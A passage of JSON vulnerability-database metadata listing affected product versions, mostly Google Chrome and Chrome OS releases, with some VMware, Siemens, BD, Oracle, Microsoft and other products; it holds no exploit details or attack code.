0.3, "vendor": "microsoft", "version": "201240" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1030" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.132" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.336" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.32" }, { "model": "vsphere data protection", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.602.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.211" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.750.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.104" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.79" }, { "model": "sql server for x64-based systems service pack", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "201240" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.415.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.931.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.115" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.722.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.32" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.520.0" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1022" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.651.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.109" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.476.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.354.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.222.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.690.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.75" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.570.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.347.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.13" }, { "model": "vsphere integrated containers", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "1.2" }, { "model": "sinumerik d sl ncu730.3", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "840" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.98" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.11" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.344" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.412.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.27" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.634.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.329.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1085.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.664.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.26" }, { "model": "sinumerik d sl ncu730.3b", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "840" }, { "model": "lsr ii", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.596.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.103" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.69" }, { "model": "unified computing system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.730.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1060.0" }, { "model": "pyxis supply roller", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.40" }, { "model": "facscount", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.610.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.422.0" }, { "model": "windows server", "scope": "eq", "trust": 0.3, "vendor": "microsoft", "version": "20160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.116" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.299.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.31" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.371.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.56" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1668.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.615.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.599.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.452.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.102" }, { "model": "enterprise mrg", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.12" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.2.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.92" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.6" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1675.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.50" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.172.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.873.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.301.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.116" }, { "model": "vrealize automation", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "6.2.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.794.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.42" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.40" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.781.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.143" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.60" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1298.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "2.0.157.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.134" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.18" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.554.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.775.1" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.71" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.59" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.631.0" }, { "model": "communications lsms", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.125" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.102" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.477.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.941.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.335.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.516.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.430.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.11" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.457.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1289.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1008.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.943.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.609.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.114" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364160" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.211.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.582.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.589.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.41" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "26.0.1410.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.575.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1671.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1663.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.356.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "29.0.1547.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1280.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.21" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.30" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.122" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.57" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.74" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.726.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.667.3" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1034.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.81" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.36" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "60.0.3112.80" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.112" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "3.0.195.32" }, { "model": "rowa dose", "scope": "eq", "trust": 0.3, "vendor": "bd", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.716.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.480.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.45" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.700.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.28" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.154" }, { "model": "xen", "scope": "eq", "trust": 0.3, "vendor": "xen", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1684.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1652.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.24" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.627.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.19" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.826.0" }, { "model": "identity manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "2.7" }, { "model": "chrome ~~~andr", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "40.0.2214.89" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.581.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.544.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.130" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1041" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.336.0" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.10" }, { "model": "chrome os", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.11" }, { "model": "simatic s7-1518-4 pn/dp odk", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "52.0.2743.82" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "53.0.2785.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.124" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1295.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.67" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.922.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.113" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.638.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1049.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.219" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "41.0.2272.118" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.910.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.149" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1686.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.90" }, { "model": "simatic ipc427d", "scope": "eq", "trust": 0.3, "vendor": "siemens", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.671.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.69" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.366.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.16" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1055.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.68" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.84" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.424.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.37" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.39" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": 